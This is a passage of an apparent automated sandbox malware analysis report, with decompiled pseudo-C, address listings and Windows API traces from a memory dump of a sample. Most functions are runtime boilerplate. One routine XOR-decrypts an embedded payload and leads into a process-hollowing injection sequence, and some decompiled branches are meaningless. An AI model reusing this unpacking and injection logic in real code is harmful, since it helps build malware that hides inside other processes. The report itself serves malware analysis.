												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
